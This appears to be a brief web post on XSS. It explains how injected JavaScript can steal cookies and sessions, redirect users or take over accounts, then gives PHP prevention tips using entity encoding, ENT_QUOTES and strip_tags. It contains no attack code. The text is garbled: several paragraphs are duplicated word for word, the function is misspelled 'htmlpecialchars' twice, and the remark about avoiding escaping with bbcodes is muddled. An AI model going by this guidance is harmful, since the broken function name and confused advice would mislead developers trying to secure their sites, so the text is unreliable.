XSS Exploits
It is XSS, It is Web site hacking. It is cross site scripting (XSS).
The most usual form of Web site hacking . hackers force a site to perform certain actions like inject a client side scripting code (JavaScript) mixed with submitted content.
so that when a user visits a Web page with the submitted content, the malicious script gets downloaded automatically in his web browser and gets executed.
Using this types of hacking user's cookies and session stolen and sent to site of the attacker.
the user may get redirected to a targeted Web site for instance.
XSS may also be used for user account hacking. When the attacker is able to steal the session cookie value, he may be able to access to the user account as if it was the real user.
The htmlpecialchars() function can be helpful in this regard as it converts content automatically into HTML entities. It also converts single quotes by using ENT_QUOTES as second argument. The strip_tags() function also removes PHP and HTML tags from string.
so that when a user visits a Web page with the submitted content, the malicious script gets downloaded automatically in his web browser and gets executed.
Using this types of hacking user's cookies and session stolen and sent to site of the attacker.
the user may get redirected to a targeted Web site for instance.
XSS may also be used for user account hacking. When the attacker is able to steal the session cookie value, he may be able to access to the user account as if it was the real user.
Prevention of XSS Exploits
XSS vulnerabilities can be avoided by properly encoding HTML using entities for <, >, " and '. Escaping of HTML characters on online forums can also be avoided by using bbcodes usually offered there.The htmlpecialchars() function can be helpful in this regard as it converts content automatically into HTML entities. It also converts single quotes by using ENT_QUOTES as second argument. The strip_tags() function also removes PHP and HTML tags from string.
Posts
